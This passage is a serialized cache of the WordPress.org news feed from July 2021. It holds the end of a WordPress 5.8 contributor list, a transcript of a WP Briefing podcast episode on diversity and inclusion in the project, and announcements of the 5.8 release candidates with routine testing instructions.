href=\"https://profiles.wordpress.org/thomasplevy/\">Thomas Patrick Levy</a>, <a href=\"https://profiles.wordpress.org/thomas-vitale/\">Thomas Vitale</a>, <a href=\"https://profiles.wordpress.org/tigertech/\">tigertech</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/timotijhof/\">TimoTijhof</a>, <a href=\"https://profiles.wordpress.org/tkama/\">Tkama</a>, <a href=\"https://profiles.wordpress.org/tmatsuur/\">tmatsuur</a>, <a href=\"https://profiles.wordpress.org/tmdk/\">tmdk</a>, <a href=\"https://profiles.wordpress.org/tz-media/\">Tobias Zimpel</a>, <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a>, <a href=\"https://profiles.wordpress.org/tjnowell/\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/skithund/\">Toni Viemer&#246;</a>, <a href=\"https://profiles.wordpress.org/hellofromtonya/\">Tonya Mork</a>, <a href=\"https://profiles.wordpress.org/toro_unit/\">Toro_Unit (Hiroshi Urabe)</a>, <a href=\"https://profiles.wordpress.org/torres126/\">torres126</a>, <a href=\"https://profiles.wordpress.org/zodiac1978/\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/toru/\">Toru Miki</a>, <a href=\"https://profiles.wordpress.org/travisnorthcutt/\">Travis Northcutt</a>, <a href=\"https://profiles.wordpress.org/trejder/\">trejder</a>, <a href=\"https://profiles.wordpress.org/desaiuditd/\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/grapplerulrich/\">Ulrich</a>, <a href=\"https://profiles.wordpress.org/utsav72640/\">Utsav tilava</a>, <a href=\"https://profiles.wordpress.org/vcanales/\">Vicente Canales</a>, <a href=\"https://profiles.wordpress.org/vipulc2/\">Vipul Chandel</a>, <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad T</a>, <a href=\"https://profiles.wordpress.org/wangql/\">wangql</a>, <a href=\"https://profiles.wordpress.org/wb1234/\">wb1234</a>, <a href=\"https://profiles.wordpress.org/webdragon/\">WebDragon</a>, <a href=\"https://profiles.wordpress.org/wendyjchen/\">Wendy Chen</a>, <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/wfmattr/\">WFMattR</a>, <a href=\"https://profiles.wordpress.org/earnjam/\">William Earnhardt</a>, <a href=\"https://profiles.wordpress.org/williampatton/\">williampatton</a>, <a href=\"https://profiles.wordpress.org/xavivars/\">Xavi Ivars</a>, <a href=\"https://profiles.wordpress.org/tikifez/\">Xristopher Anderton</a>, <a href=\"https://profiles.wordpress.org/y_kolev/\">Y_Kolev</a>, <a href=\"https://profiles.wordpress.org/yansern/\">Yan Sern</a>, <a href=\"https://profiles.wordpress.org/fierevere/\">Yui</a>, <a href=\"https://profiles.wordpress.org/yuliyan/\">Yuliyan Slavchev</a>, <a href=\"https://profiles.wordpress.org/yvettesonneveld/\">Yvette Sonneveld</a>, <a href=\"https://profiles.wordpress.org/zackkrida/\">Zack Krida</a>, <a href=\"https://profiles.wordpress.org/zebulan/\">Zebulan Stanphill</a>, <a href=\"https://profiles.wordpress.org/zkancs/\">zkancs</a>, and <a href=\"https://profiles.wordpress.org/sunxiyuan/\">孙锡源</a>.\n\n\n\n<p></p>\n\n\n\n<p>In addition to these contributors, many thanks to all of the community volunteers who contribute in the&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://wordpress.org/support/\">support forums</a>. They answer questions from people across the world, whether they are using WordPress for the first time, or they’ve been around since the first release all the way back in 2003. These releases are as successful as they are because of their efforts!</p>\n\n\n\n<p>Finally, thanks to all the community translators who help make WordPress available in over 200 languages for every release. 80 languages have translated 80% or more WordPress 5.8 and our community translators are hard at work ensuring more languages are on their way. If contributing to WordPress appeals to you, it’s easy to learn more. Check out&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://make.wordpress.org/\">Make WordPress</a>&nbsp;or the&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10976\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WP Briefing: Episode 13: Cherishing WordPress Diversity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/news/2021/07/episode-13-cherishing-wordpress-diversity/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Jul 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=10949\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:357:\"In this episode, Josepha Haden Chomphosy discusses the importance of Diversity, Equity, and Inclusion to the fabric of the WordPress project and how we can move from a place of welcoming it to cherishing it. Have a question you&#8217;d like answered? You can submit them to wpbriefing@wordpress.org, either written or as a voice recording. Credits [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/07/WP-Briefing-013.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14890:\"\n<p>In this episode, Josepha Haden Chomphosy discusses the importance of Diversity, Equity, and Inclusion to the fabric of the WordPress project and how we can move from a place of welcoming it to cherishing it.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor: <a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></p>\n\n\n\n<p>Logo: <a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></p>\n\n\n\n<p>Production: <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></p>\n\n\n\n<p>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/event-formats/diversity-speaker-training-workshop/\">Diverse Speaker Training Workshop</a></p>\n\n\n\n<p><a href=\"https://josepha.blog/2020/12/23/a-wordpress-dinner-party/\">A WordPress Dinner Party</a></p>\n\n\n\n<p><a href=\"https://josepha.blog/2018/11/06/the-burden-of-proof/\">The Burden of Proof</a></p>\n\n\n\n<p><a href=\"https://josepha.blog/2021/03/05/leading-at-any-level/\">Leadership At Any Level</a></p>\n\n\n\n<p><a href=\"https://josepha.blog/2019/03/02/building-a-culture-of-safety/\">Building a Culture of Safety</a></p>\n\n\n\n<p><a href=\"https://josepha.blog/2020/03/27/leadership-basics-ethics-in-communication/\">Leadership Basics: Ethics in Communication</a></p>\n\n\n\n<p><a href=\"https://wordpress.org/support/wordpress-version/version-5-6/\">WordPress 5.6</a></p>\n\n\n\n<p>Bonus resource: <a href=\"https://allienimmons.com/how-to-be-a-wordpress-ally/\">How to Be a WordPress Ally</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-10949\"></span>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:10</p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy. And before we get started, I have to be honest with you all, this episode and the next one have made me feel really anxious. This one is about Diversity, Equity, and Inclusion in open source, and especially in WordPress. And the next one is about accessibility in WordPress. And I feel like there&#8217;s just so much to do, and we don&#8217;t do enough, but we do what we can. And still, we will never be done with that work. And if you don&#8217;t know what I mean by Diversity, Equity, and Inclusion, you can kind of think of it this way. Diversity is bringing in people with different viewpoints and lived experiences. Equity is making sure everyone has what they need to get a fair chance of success, which is different from equality. And Inclusion is making sure that the environment is built to not only tolerate diverse groups but to celebrate them as well. So remember this as you listen to what I have to say here. We are never where we want to be in either of those spaces. But that shouldn&#8217;t stop us from looking at the things we have done to get us in the right direction. All right. Here we go.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:54</p>\n\n\n\n<p>I say a lot that we are a project that serves a majority collection of minority voices. WordPress is global in reach and open source in nature. And you would assume that what allows the software to be used by anyone would also enable it to be built by anyone. After all, your location doesn&#8217;t matter, and who employs you also doesn&#8217;t matter. And your relative social standing certainly shouldn&#8217;t matter. As long as you can communicate with the others contributing to the project, there should be no obstacle to your participation. The mission of the WordPress project is to democratize publishing, right? It&#8217;s to get the ability to have a website tap into passive income on your web presence. I mean, the job is to level the playing field for everyone. However, it&#8217;s my experience that bringing in new voices takes a lot of proactive work on behalf of leaders and contributors. It&#8217;s not enough to say, &#8220;Hey, I&#8217;m having a party,&#8221; you also have to say, &#8220;I&#8217;m having a party, and I&#8217;d like you to be there.&#8221; It&#8217;s not enough to think people will make their own space at this table. You have to make sure that you have table settings for everyone. And even beyond the basics of directing people to you.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:12</p>\n\n\n\n<p>And on toward the next steps, you have to be honest about the fact that open source contribution requires a fair amount of privilege. By privilege, I mean the luxury of extra time or extra funding or just an understanding employer. WordPress supports 41% of the web. I think it&#8217;s 42% of the web right now. But less than 1% of people who use WordPress show up to help maintain it. And that 1% that does show up skews toward people who already have a pretty high level of representation and technology. And so, when you look at who is building it versus who is using it, it doesn&#8217;t always match. And since what we build so frequently reflects who we are, sometimes what we build doesn&#8217;t match the needs of the people who are using what we have.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:10</p>\n\n\n\n<p>So what has WordPress done to be proactive on the question of Diversity, Equity, and Inclusion? There are quite a few unseen things that have gone into this over the years and a few pretty visible things. This is a very long list. And it has a whole lot of just reference material. And so the show notes today will come in handy for people, and there will be just a laundry list of linked resources for everyone.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:39</p>\n\n\n\n<p>But the first thing that WordPress has done is that we have accepted the burden of proof. I&#8217;m going to share a post about this in the show notes. That means we accept that it&#8217;s not the job of underrepresented folks to figure out if they are welcome. It&#8217;s up to us to make it clear that they are. So, there are three big little things that the community has done over the years. One is that many teams open their text-based meetings with an explanation of what is done in the meeting, who comes to the meetings, where to find help if you&#8217;re lost in the meeting, and for teams that have a specific type of requests that comes into those channels that aren&#8217;t handled in those channels. They also will share where people can go to get those requests taken care of. Many teams have also updated their team handbooks to have good beginner docs, limited use of inside jokes or jargon, and good first bugs. And also, there is a code of conduct in the community declaring that everyone is welcome and clarifies what to do if you see folks being unwelcoming.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>05:51</p>\n\n\n\n<p>A second big thing that folks in the WordPress community have done is written down what was unwritten. Having things clearly documented unlocks institutional knowledge that you&#8217;d otherwise have to know someone to get. Clarity and process and the structure help anyone engage with your organization, not just the people who have extra time to figure things out. What that looks like in the WordPress project is that many teams have documented their workflows and their working spaces and just their general team norms. Many teams have also started defining what it means to be a team rep and holding open processes to choose those team reps. Many other community leaders and I have written down countless unspoken rules, guidelines, and philosophical underpinnings so that people don&#8217;t have to guess what we&#8217;re doing or why we&#8217;re doing things, or where we want to do them.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:46</p>\n\n\n\n<p>And the more visible thing that the WordPress project has been doing is that we found ways to invite people in, and they&#8217;re not failsafe; they’re not foolproof, but it is certainly a step in the right direction. The first one is an ongoing, diverse speaker training initiative. And I&#8217;ll include a link to that in the show notes as well. It is run by Jill Binder and a fantastic group of contributors that collaborate with her. And I really have loved watching that particular program grow and flourish and help WordPress make a difference where we absolutely can.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:27</p>\n\n\n\n<p>The second thing that was pretty visible about how we invited people in was at the end of 2020, and we had an all-women and nonbinary release squad for our biggest release of the year; WordPress 5.6. I had a group of probably 70 women and nonbinary identifying folx who joined in the process and joined in learning more about the process. Some of them have continued in the project. Others have stepped away for various reasons. But all of them are welcome to return. And I encourage everyone to return to contribution when time and resources make that possible for you.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:09</p>\n\n\n\n<p>And then the third thing that we&#8217;ve done, which I have talked about a lot, is the revival of the testing and triage practices. That has been work that&#8217;s been ongoing for a number of years. And it happens across multiple teams. It is not always immediately clear to people why the testing work. And the triage work is identifiable for me as a way to invite people into this process. And so I&#8217;ll be briefly clear about it right now. So testing as a practice brings in the users that otherwise don&#8217;t have a lot of spare time and that extra privilege to like, figure out what&#8217;s going on with WordPress, and contribute their own fixes to problems. They can give back to this project by being co-developers with us, co-creators with our entire process of making WordPress real and usable for the largest number of people that we can because we now support 42% of the web. And then, the triage practice invites in a diverse voice of people. Because you don&#8217;t necessarily always need to know everything about a project to help with triage. And when you&#8217;re helping with triage, you get active learning through participating in the process. But you also get passive learning from the people who already know huge amounts about the project and the process and everything that goes into it. And so it&#8217;s a low key low stress way to get your feet wet and start building that knowledge that sometimes is hard to come by unless you are actively working in it. So the testing practices, the triage practices, I really to the core of my being believe that those are active and ongoing ways for us to invite people who otherwise wouldn&#8217;t have a chance to get their voices heard in an open source project. And y&#8217;all, as I said at the start, y’all, there&#8217;s nothing about this list that I just shared, which makes me feel like our work on this is done. Just like any muscle, you don&#8217;t fight to peak fitness, and then hit the big stop button on time and say, &#8220;Now, I never have to work out again.&#8221; If we did, the world would be a very different place probably. But it does then lead us to the next steps for fostering a community culture that&#8217;s as broad as the people who use this software. If you believe in leadership at any level, as I do, there are a ton of things that you can do right now. But I&#8217;ll boil them down into three big chunks of things.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>10:54</p>\n\n\n\n<p>First, check your community area, or whatever community you want to apply this to, for things that need a little more proactive work. I will share a post called<em> Building A Culture of Safety</em> that will take you through a list of good first steps. And it is not as hard as it looks. When you say build a culture of safety, there are many really clear-cut minor changes that you can ask people to make and, in like, four or five different areas that can help your community be more welcoming and more open.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>11:30</p>\n\n\n\n<p>The second thing that you can do is know that small changes add up over time and commit to making those changes where you can. If you are elite at any level, you know that supporting people and processes is the responsibility of everyone in the group. And if you can make your own autonomous decisions and commit to making small changes that make a big difference over time, you will be part of that solution. And that is not specific to any one group that we have in our communities. You can be an ally for anyone, whether they look like you, whether they have your same experiences, or not. And sometimes, it&#8217;s as easy as just holding space for the people who haven&#8217;t had a chance to talk yet. And on the subject of holding space and the way that we communicate.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>12:22</p>\n\n\n\n<p>The third thing that I think is incredibly important is that you can take on as a foundational personal practice the concept of ethical communication. I&#8217;ll share a post about that as well in the show notes, but the core of it is that you have to know that what you say and don&#8217;t say what you do and don&#8217;t do has an impact on others and embrace that responsibility. All right, so you made it all the way through, and I am so proud of you. I&#8217;m sure you have questions about this. And I encourage you to share those. You can email them to me at wp briefing@wordpress.org.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>13:10</p>\n\n\n\n<p>This brings us to our small list of big things. I&#8217;ve got two things for you today. First and foremost, WordPress 5.8 gets released tomorrow. It&#8217;s a big release, and lots of people have been working on it. So get your update processes ready and keep an eye on wordpress.org/news for the announcement post. Second, and still pretty important, team reps have been working on their quarterly check-ins so that all other teams can get an idea of what&#8217;s happening around the WordPress office. Keep an eye out for that post on make.wordpress.org/updates. And that is your smallest of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host Joseph Hayden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10949\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 5.8 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2021/07/wordpress-5-8-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 14 Jul 2021 01:09:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10933\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:303:\"The third release candidate for WordPress 5.8 is now available! WordPress 5.8 is slated for release on July 20, 2021, and we need your help to get there—if you have not tried 5.8 yet, now is the time! You can test the WordPress 5.8 release candidate 3 in any of these three ways: Install and [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Jeffrey Paul\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3233:\"\n<p>The third release candidate for <a href=\"https://make.wordpress.org/core/5-8/\">WordPress 5.8</a> is now available! </p>\n\n\n\n<p>WordPress 5.8 is slated for release on <strong>July 20, 2021</strong>, and we need <em>your</em> help to get there—if you have not tried 5.8 yet, now is the time!</p>\n\n\n\n<p>You can test the WordPress 5.8 release candidate 3 in any of these three ways:</p>\n\n\n\n<ul><li>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester plugin</a> (select the <code>Bleeding edge</code> channel and then <code>Beta/RC Only</code> stream)</li><li>Directly download the release candidate version <a href=\"https://wordpress.org/wordpress-5.8-RC3.zip\">(zip)</a></li><li>Use WP-CLI to test: <code>wp core update --version=5.8-RC3</code></li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta/RC releases and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.8 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the <code>readme</code> file to 5.8.  If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>&nbsp;so we can work to solve them in time for the final release.</p>\n\n\n\n<p>For a more detailed breakdown of the changes included in WordPress 5.8, check out the <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-1/\">WordPress 5.8 beta 1 post</a>.  The&nbsp;<a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://make.wordpress.org/core/2021/07/03/wordpress-5-8-field-guide/\">WordPress 5.8 Field Guide</a>, which is particularly useful for developers, has all the info and further links to help you get comfortable with the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Can you speak and write in a language other than English? &nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a></p>\n\n\n\n<p><em><strong>If you think you have found a bug</strong>, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a>&nbsp;in the support forums. We would love to hear from you!  If you are comfortable writing a reproducible bug report,&nbsp;<a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\n\n\n\n<p class=\"has-text-align-right\"><strong><em>Props to <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>, <a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>, and <a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a> for peer-reviewing!</em></strong></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<p><em>Code is poetry<br>Jazz is improvisation<br>Both are forms of art<br><br></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10933\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 5.8 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2021/07/wordpress-5-8-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Jul 2021 01:12:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10912\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:305:\"The second release candidate for WordPress 5.8 is now available! ? WordPress 5.8 is slated for release on July 20, 2021, and we need your help to get there—if you have not tried 5.8 yet, now is the time! You can test the WordPress 5.8 release candidate 2 in any of these three ways: Install [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Jeffrey Paul\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3376:\"\n<p>The second release candidate for <a href=\"https://make.wordpress.org/core/5-8/\">WordPress 5.8</a> is now available! <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/1f389.png\" alt=\"?\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n\n\n\n<p>WordPress 5.8 is slated for release on <strong>July 20, 2021</strong>, and we need <em>your</em> help to get there—if you have not tried 5.8 yet, now is the time!</p>\n\n\n\n<p>You can test the WordPress 5.8 release candidate 2 in any of these three ways:</p>\n\n\n\n<ul><li>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester plugin</a> (select the <code>Bleeding edge</code> channel and then <code>Beta/RC Only</code> stream)</li><li>Directly download the release candidate version <a href=\"https://wordpress.org/wordpress-5.8-RC2.zip\">(zip)</a></li><li>Use WP-CLI to test: <code>wp core update --version=5.8-RC2</code></li></ul>\n\n\n\n<p>Thank you to all of the 